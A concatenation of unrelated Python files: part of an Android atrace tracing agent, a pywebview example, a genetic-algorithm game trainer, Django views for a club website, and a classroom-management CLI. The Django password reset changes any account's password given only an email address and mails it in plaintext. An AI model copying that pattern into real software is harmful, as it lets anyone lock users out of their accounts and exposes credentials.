unavailable = [x for x in self._categories.split(',') if
x not in avail_cats]
self._categories = [x for x in self._categories.split(',') if
x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_start'], check_return=True)
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' %s/trace_marker' % (sync_id, self._tracing_path)
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _stop_collect_trace(self):
"""Stops atrace.
Note that prior to Api 23, --async-stop isn't working correctly. It
doesn't stop tracing and clears trace buffer before dumping it rendering
results unusable."""
if self._device_sdk_version < version_codes.MARSHMALLOW:
is_trace_enabled_file = '%s/tracing_on' % self._tracing_path
# Stop tracing first so new data won't arrive while dump is performed (it
# may take a non-trivial time and tracing buffer may overflow).
self._device_utils.WriteFile(is_trace_enabled_file, '0')
result = self._device_utils.RunShellCommand(
self._tracer_args + ['--async_dump'], raw_output=True,
large_output=True, check_return=True,
timeout=ADB_LARGE_OUTPUT_TIMEOUT)
# Run synchronous tracing for 0 seconds to stop tracing, clear buffers
# and other state.
self._device_utils.RunShellCommand(
self._tracer_args + ['-t 0'], check_return=True)
else:
# On M+ --async_stop does everything necessary
result = self._device_utils.RunShellCommand(
self._tracer_args + ['--async_stop'], raw_output=True,
large_output=True, check_return=True,
timeout=ADB_LARGE_OUTPUT_TIMEOUT)
return result
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
result = self._stop_collect_trace()
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if _FIX_MISSING_TGIDS:
# Gather proc data from device and patch tgids
procfs_dump = self._device_utils.RunShellCommand(
'echo -n /proc/[0-9]*/task/[0-9]*',
shell=True, check_return=True)[0].split(' ')
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if _FIX_CIRCULAR_TRACES:
trace_data = fix_circular_traces(trace_data)
return trace_data
def extract_tgids(trace_lines):
"""Removes the procfs dump from the given trace text
Args:
trace_lines: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
for line in trace_lines:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
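# Example: a trace_lines entry '/proc/1234/task/1235' yields
# {'1235': '1234'}, i.e. each thread id keyed to its thread-group id.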
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, compress_trace_data, from_file,
device_serial_number, trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
# Trace compression is broken on Windows.
# TODO: Fix https://crbug.com/739751.
self.compress_trace_data = \
compress_trace_data and platform.system() != 'Windows'
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--from-file', dest='from_file',
action='store', help='read the trace from a '
'file (compressed) rather than running a '
'live trace')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.compress_trace_data,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
|
destroy_window.py
|
import webview
import threading
import time
"""
This example demonstrates how a webview window is created and destroyed
programmatically after 5 seconds.
"""
def destroy():
# show the window for a few seconds before destroying it:
time.sleep(5)
print("Destroying window..")
webview.destroy_window()
print("Destroyed!")
if __name__ == '__main__':
t = threading.Thread(target=destroy)
t.start()
webview.create_window("Destroy Window Example", "https://pywebview.flowrl.com/hello")
print("Window is destroyed")
|
genetic_algorithm.py
|
import multiprocessing as mp
import threading
import queue
import numpy as np
import nn
# taken from:
# https://machinelearningmastery.com/simple-genetic-algorithm-from-scratch-in-python/
import new_main
# genetic algorithm search for continuous function optimization
from numpy.random import randint
from numpy.random import rand
# objective function (placeholder from the tutorial; shadowed by the
# queue-based objective defined near the bottom of this file)
def objective(x):
return x[0] ** 2.0 + x[1] ** 2.0
# decode bitstring to numbers
def decode(bounds, n_bits, bitstring):
decoded = list()
largest = 2 ** n_bits
for i in range(len(bounds)):
# extract the substring
start, end = i * n_bits, (i * n_bits) + n_bits
substring = bitstring[start:end]
# convert bitstring to a string of chars
chars = ''.join([str(s) for s in substring])
# convert string to integer
integer = int(chars, 2)
# scale integer to desired range
value = bounds[i][0] + (integer / largest) * (bounds[i][1] - bounds[i][0])
# store
decoded.append(value)
return decoded
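# Worked example: with bounds=[[-1.0, 1.0]], n_bits=4 and bitstring
# [1, 0, 0, 0], largest is 16, the substring '1000' decodes to the integer 8,
# and the value is -1.0 + (8 / 16) * (1.0 - -1.0) = 0.0.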
# tournament selection
def selection(pop, scores, k=3):
# first random selection
selection_ix = randint(len(pop))
for ix in randint(0, len(pop), k - 1):
# check if better (e.g. perform a tournament)
if scores[ix] < scores[selection_ix]:
selection_ix = ix
return pop[selection_ix]
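# Example: with k=3 the tournament draws three random indices and keeps the
# candidate with the lowest score, since this GA minimizes the objective.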
# crossover two parents to create two children
def crossover(p1, p2, r_cross):
# children are copies of parents by default
c1, c2 = p1.copy(), p2.copy()
# check for recombination
if rand() < r_cross:
# select crossover point that is not on the end of the string
pt = randint(1, len(p1) - 2)
# perform crossover
c1 = p1[:pt] + p2[pt:]
c2 = p2[:pt] + p1[pt:]
return [c1, c2]
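# Example: p1=[0,0,0,0] and p2=[1,1,1,1] with crossover point pt=2 yield
# c1=[0,0,1,1] and c2=[1,1,0,0]; when rand() >= r_cross the parents are
# returned unchanged (as copies).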
# mutation operator
def mutation(bitstring, r_mut):
for i in range(len(bitstring)):
# check for a mutation
if rand() < r_mut:
# flip the bit
bitstring[i] = 1 - bitstring[i]
# genetic algorithm
def genetic_algorithm(objective, bounds, n_bits, n_iter, n_pop, r_cross, r_mut):
# initial population of random bitstring
pop = [randint(0, 2, n_bits * len(bounds)).tolist() for _ in range(n_pop)]
# keep track of best solution
best = 0
best_eval = queue.Queue()
objective(best_eval, decode(bounds, n_bits, pop[0]))
best_eval = best_eval.get()
# enumerate generations
for gen in range(n_iter):
# decode population
decoded = [decode(bounds, n_bits, p) for p in pop]
# evaluate all candidates in the population
# ******
outputQueue = queue.Queue()
thread = threading.Thread(target=simulate_game, args=(outputQueue, decoded))
thread.start()
scores = outputQueue.get()
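# outputQueue.get() blocks until simulate_game puts the scores, so it also
# acts as an implicit join on the worker thread.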
# ******
# check for new best solution
for i in range(n_pop):
if scores[i] < best_eval:
best, best_eval = pop[i], scores[i]
# print(">%d, new best f(%s) = %f" % (gen, decoded[i], scores[i]))
# select parents
selected = [selection(pop, scores) for _ in range(n_pop)]
# create the next generation
children = list()
for i in range(0, n_pop, 2):
# get selected parents in pairs
p1, p2 = selected[i], selected[i + 1]
# crossover and mutation
for c in crossover(p1, p2, r_cross):
# mutation
mutation(c, r_mut)
# store for next generation
children.append(c)
# replace population
pop = children
# Lengthen the game time every iteration so training covers the
# expanding path
new_main.ITERATION_TIME += 0.5
return [best, best_eval]
def simulate_game(outputQueue, decoded):
print("starting game")
scores = []
population = []
for d in decoded:
population.append(new_main.Phenotype(d))
game = new_main.Game(population)
scores = game.get_scores()
outputQueue.put(scores)
print(scores)
print("finished game")
# objective function
def objective(output, weights):
output.put(sum(weights))
# define range for input
bounds = [[-1.0, 1.0]]*nn.num_weights
# define the total iterations
n_iter = 100
# bits per variable
n_bits = 16
# define the population size
n_pop = 20
# crossover rate
r_cross = 0.9
# mutation rate
r_mut = 0.5 / (float(n_bits) * len(bounds))
# perform the genetic algorithm search
best, score = genetic_algorithm(objective, bounds, n_bits, n_iter, n_pop, r_cross, r_mut)
print('Done!')
decoded = decode(bounds, n_bits, best)
print('f(%s) = %f' % (decoded, score))
|
views.py
|
from django.db import IntegrityError
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.views.generic import View, ListView
from django.contrib.auth.hashers import check_password
from django.contrib import auth
from django.core.mail import EmailMultiAlternatives
import threading
from .models import *
from .forms import *
# Create your views here.
# TODO: handle login/signup and password mismatch via AJAX
class FaqView(View):
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/faq.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'faq_1': Faq.objects.filter(tag_id=1), 'faq_2': Faq.objects.filter(tag_id=2)})
return render(request, 'www/faq.html', {'reset_password_form': ResetPassword(), 'faq_1': Faq.objects.filter(tag_id=1), 'faq_2': Faq.objects.filter(tag_id=2)})
class Auth(View):
pass
class IndexView(View):
def post(self, request):
typewrite_result = ""
for i in TypeWrite.objects.all():
typewrite_result += "\""
typewrite_result += i.__str__()
typewrite_result += "\","
typewrite_result = typewrite_result[:typewrite_result.__len__() - 1]
return auth_controls(request, typewrite_result)
def get(self, request):
typewrite_result = ""
for i in TypeWrite.objects.all():
typewrite_result += "\""
typewrite_result += i.__str__()
typewrite_result += "\","
typewrite_result = typewrite_result[:typewrite_result.__len__() - 1]
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/index.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result})
return render(request, 'www/index.html', {'reset_password_form': ResetPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result})
class TeamView(View):
def post(self, request):
return auth_controls(request, '')
def get(self, request):
operators = User.objects.filter(is_staff=True, is_superuser=False).select_related('advanceduser').order_by('-date_joined')
# TODO: optimize this query
members = User.objects.filter(is_staff=False, is_superuser=False).select_related('advanceduser').order_by('-date_joined')
members = members.raw('SELECT * FROM auth_user JOIN www_member ON auth_user.email = www_member.email')
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/team.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'operators': operators, 'members': members})
return render(request, 'www/team.html', {'reset_password_form': ResetPassword(), 'operators': operators, 'members': members})
class NoticeContentView(View):
def get(self, request, slug):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/notice.html',
{'profile_form': profile_form, 'edit_password_form': EditPassword(), 'posts': Notice.objects.order_by('-created_date'), 'notice': Notice.objects.get(slug=slug)})
return render(request, 'www/notice.html', {'reset_password_form': ResetPassword(), 'posts': Notice.objects.order_by('-created_date'), 'notice': Notice.objects.get(slug=slug)})
class NoticeListView(View):
def post(self, request):
return auth_controls(request, '')
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/notice_list.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'notice': Notice.objects.order_by('-created_date')})
return render(request, 'www/notice_list.html', {'reset_password_form': ResetPassword(), 'notice': Notice.objects.order_by('-created_date')})
class NoticeNewView(View):
def post(self, request):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
form_data.save()
# obj = form_data.save(commit=False)
# obj.user = request.user
# obj.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': 'An error occurred while submitting.'})
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/portfolio_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'notice_form': NewPortfolio()})
return HttpResponseRedirect('/notice')
#
# def post(request, post_url):
# content = Post.objects.get(title=post_url)
# return render(request, 'www/post.html', {'post': content})
class PortfolioView(View):
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/portfolio.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignments': Portfolio.objects.order_by('-datetime_created')})
return render(request, 'www/portfolio.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-datetime_created')})
class AssignmentGetView(View):
def get(self, request, assignment_url):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/assignment.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment': Portfolio.objects.get(id=assignment_url)})
return render(request, 'www/assignment.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-created_date')})
class AssignmentEditView(View):
def post(self, request, assignment_url):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
assignment = Portfolio.objects.get(id=assignment_url)
assignment.title = request.POST['title']
assignment.content = request.POST['content']
assignment.file = request.POST['file']
assignment.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': 'An error occurred while submitting.'})
def get(self, request, assignment_url):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
assignment_form = NewPortfolio(instance=Portfolio.objects.get(id=assignment_url))
return render(request, 'www/assignment_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment_form': assignment_form})
return render(request, 'www/assignment_new.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-created_date')})
class AssignmentNewView(View):
def post(self, request):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
form_data.save()
# obj = form_data.save(commit=False)
# obj.user = request.user
# obj.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': 'An error occurred while submitting.'})
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/assignment_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment_form': NewPortfolio()})
return HttpResponseRedirect('/assignment')
def portfolio(request):
return render(request, 'www/portfolio.html')
def error404(request):
return render(request, 'www/404.html')
def auth_controls(request, typewrite_result):
if request.POST['submit_type'] == "login":
user = auth.authenticate(request, username=request.POST['username'], password=request.POST['password'])
if user is not None:
if user.is_active:
auth.login(request, user)
return HttpResponseRedirect('/')
else:
return render(request, 'www/index.html', {'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': 'failedLogin'})
elif request.POST['submit_type'] == "signup":
if request.POST['password'] == request.POST['password-verify']:
try:
if not User.objects.filter(email=request.POST['email']):
user = User.objects.create_user(username=request.POST['username'], email=request.POST['email'], password=request.POST['password'])
advanced_user = AdvancedUser(user_id=user.id)
advanced_user.save()
auth.login(request, user)
else:
raise Exception
except IntegrityError:
flash_data = 'failedSignup'
except Exception:
flash_data = 'failedSignup'
else:
flash_data = 'successSignup'
else:
flash_data = 'notMatchPassword'
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/index.html',
{'profile_form': profile_form, 'edit_password_form': EditPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': flash_data})
return render(request, 'www/index.html', {'reset_password_form': ResetPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': flash_data})
elif request.POST['submit_type'] == "logout":
auth.logout(request)
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "edit_profile":
try:
instance_user = AdvancedUser.objects.get(user_id=auth.get_user(request).id)
form_data = EditProfile(request.POST, request.FILES, instance=instance_user)
if form_data.is_valid():
obj = form_data.save(commit=False)
obj.user = request.user
obj.save()
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
except AdvancedUser.DoesNotExist:
form_data = EditProfile(request.POST)
if form_data.is_valid():
obj = form_data.save(commit=False)
obj.user = request.user
obj.save()
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "edit_password":
if check_password(request.POST['current_password'], request.user.password):
if request.POST['password'] == request.POST['password_verify']:
request.user.set_password(request.POST['password'])
request.user.save()
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "reset_password":
try:
user = User.objects.get(email=request.POST['email'])
password = User.objects.make_random_password(length=12)
user.set_password(password)
user.save()
mailing = EmailThread('KNUT X LIKE LION temporary password issued', '', 'KNUT X LIKE LION', [request.POST['email']], False,
'<div dir="ltr"><p>A temporary password has been issued by KNUT X LIKE LION. Please change your password after logging in.</p><p>Temporary password: ' + password + '</p><div dir="ltr" class="gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><div><div dir="ltr"><div dir="ltr"><div dir="ltr"><div><b><br></b></div><div><b>HACK YOUR LIFE</b></div><div>LIKE LION at Korea National University of Transportation, <b>KNUT X LIKE LION</b></div><div><a href="http://knut.likelion.org" target="_blank">http://knut.likelion.org</a></div><div><a href="https://facebook.com/likelionKNUT" target="_blank">https://facebook.com/likelionKNUT</a></div><div><a href="https://likelion.net" target="_blank">https://likelion.net</a></div></div></div></div></div></div></div></div>')
mailing.start()
except User.DoesNotExist:
return HttpResponseRedirect('/')
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
class EmailThread(threading.Thread):
def __init__(self, subject, body, from_email, recipient_list, fail_silently, html):
self.subject = subject
self.body = body
self.recipient_list = recipient_list
self.from_email = from_email
self.fail_silently = fail_silently
self.html = html
threading.Thread.__init__(self)
def run(self):
msg = EmailMultiAlternatives(self.subject, self.body, self.from_email, self.recipient_list)
if self.html:
msg.attach_alternative(self.html, 'text/html')
msg.send(self.fail_silently)
|
cli.py
|
#!/usr/bin/env python3
import logging
import multiprocessing as mp
import os
import sys
import click
import polypuppet.agent.output as out
from polypuppet import Config
from polypuppet.agent.agent import Agent
from polypuppet.agent.vagrant import Vagrant
from polypuppet.exception import PolypuppetException
from polypuppet.messages import Messages
_GRPC_V = 'GRPC_VERBOSITY'
def verbosity_option(f):
    def callback(ctx, param, value):
        if value > 0:
            root = logging.root
            root.setLevel(logging.DEBUG)
        if value > 1:
            os.environ[_GRPC_V] = 'DEBUG'
        return value
    return click.option('-v', '--verbose', count=True,
                        expose_value=False,
                        help='Enables verbosity.',
                        callback=callback)(f)
@click.group()
@verbosity_option
def cli():
    pass
@cli.command(help=Messages.help_autosign())
@click.argument('certname')
@verbosity_option
def autosign(certname):
    agent = Agent()
    has_certname = agent.autosign(certname)
    if not has_certname:
        sys.exit(1)
@cli.group('login', help=Messages.help_login())
@verbosity_option
def login_group():
    pass
def check_login(response):
    if response:
        out.info(Messages.logged_in())
    else:
        out.warning(Messages.not_logged_in())
        sys.exit(1)
@login_group.command(help=Messages.help_login_user())
@click.argument('username', required=False)
@click.argument('password', required=False)
@verbosity_option
def user(username, password):
    agent = Agent()
    if username is None:
        username = click.prompt('Username')
    if password is None:
        password = click.prompt('Password', hide_input=True)
    response = agent.login(username, password)
    check_login(response)
@login_group.command(help=Messages.help_login_classroom())
@click.argument('building', required=True, type=click.INT)
@click.argument('number', required=True, type=click.INT)
@click.argument('token', required=True, type=click.STRING)
@verbosity_option
def classroom(building, number, token):
    agent = Agent()
    response = agent.classroom(building, number, token)
    check_login(response)
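# Runs the server in the foreground, replacing any instance that is already
# running; the import is delayed so unsupported platforms fail gracefully.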
def start_server():
    try:
        # This prevents error messages on operating systems that are not supported by the server
        from polypuppet.server.server import main as server_main
        agent = Agent()
        agent.stop_server()
        server_main()
    except ModuleNotFoundError:
        out.critical(Messages.unsupported_os())
        sys.exit(1)
    except PolypuppetException as pe:
        out.critical(pe.message)
        sys.exit(1)
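# 'polypuppet server' without a subcommand starts the server in the
# foreground; invoke_without_command routes the bare invocation here.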
@cli.group(name='server', invoke_without_command=True, help=Messages.help_server())
@click.pass_context
@verbosity_option
def group_server(ctx):
    if not ctx.invoked_subcommand:
        start_server()
@group_server.command(name='stop', help=Messages.help_server_stop())
@verbosity_option
def server_stop():
    agent = Agent()
    if agent.stop_server():
        out.info(Messages.server_stopped())
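# Detaches the server into a child process; os._exit(0) then terminates the
# parent immediately, skipping interpreter cleanup and atexit handlers.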
@group_server.command(name='daemon', help=Messages.help_server_daemon())
@verbosity_option
def server_daemon():
    process = mp.Process(target=start_server)
    process.start()
    os._exit(0)
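# 'polypuppet config' lists all keys, 'config KEY' prints a single value and
# 'config KEY VALUE' updates it through the restricted setter.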
@cli.command(name='config', help=Messages.help_config())
@click.argument('key', required=False)
@click.argument('value', required=False)
@verbosity_option
def manage_config(key, value):
    config = Config()
    if key is None:
        for key, value in config.all().items():
            out.info(key + '=' + value)
    elif value is None:
        out.info(config[key])
    else:
        config.restricted_set(key, value)
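# The 'test' subcommands are predicates for shell scripts and CI: they print
# nothing and report mismatches through a non-zero exit status.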
@cli.group(name='test', help=Messages.help_test())
@verbosity_option
def test_group():
    pass
@test_group.command(name='classroom', help=Messages.help_test_classroom())
@click.argument('building')
@click.argument('classroom')
@verbosity_option
def test_classroom(building, classroom):
    config = Config()
    if config['CLASSROOM'] != classroom or config['BUILDING'] != building:
        sys.exit(1)
@test_group.command(name='config', help=Messages.help_test_config())
@click.argument('key')
@click.argument('value')
@verbosity_option
def test_config(key, value):
    config = Config()
    try:
        if config[key] != value:
            sys.exit(1)
    except PolypuppetException:
        sys.exit(1)
@test_group.command(name='vm', help=Messages.help_test_vm())
@click.argument('vm_name')
@verbosity_option
def test_vm(vm_name):
    vagrant = Vagrant()
    if not vagrant.is_created(vm_name):
        sys.exit(1)
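# 'polypuppet token' without a subcommand prints the current server token and
# exits non-zero when no token has been generated yet.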
@cli.group(name='token', invoke_without_command=True, help=Messages.help_token())
@click.pass_context
@verbosity_option
def token_group(ctx):
    if not ctx.invoked_subcommand:
        agent = Agent()
        server_token = agent.get_token()
        if server_token:
            out.info(server_token)
        else:
            out.warning(Messages.token_not_generated())
            sys.exit(1)
@token_group.command(name='new', help=Messages.help_token_new())
@verbosity_option
def token_new():
    agent = Agent()
    server_token = agent.update_token()
    out.info(server_token)
@token_group.command(name='clear', help=Messages.help_token_clear())
@verbosity_option
def token_clear():
    agent = Agent()
    agent.clear_token()
@token_group.command(name='set', help=Messages.help_token_set())
@click.argument('token')
@verbosity_option
def token_set(token):
    agent = Agent()
    agent.set_token(token)
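# gRPC logging is silenced by default; the -v/--verbose option re-enables it.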
def main():
    os.environ[_GRPC_V] = 'NONE'
    log_level = logging.INFO
    log_format = '%(message)s'
    logging.basicConfig(format=log_format, level=log_level)
    try:
        cli()
    except PolypuppetException as pe:
        out.critical(pe.message)
        sys.exit(1)
if __name__ == "__main__":
    main()
|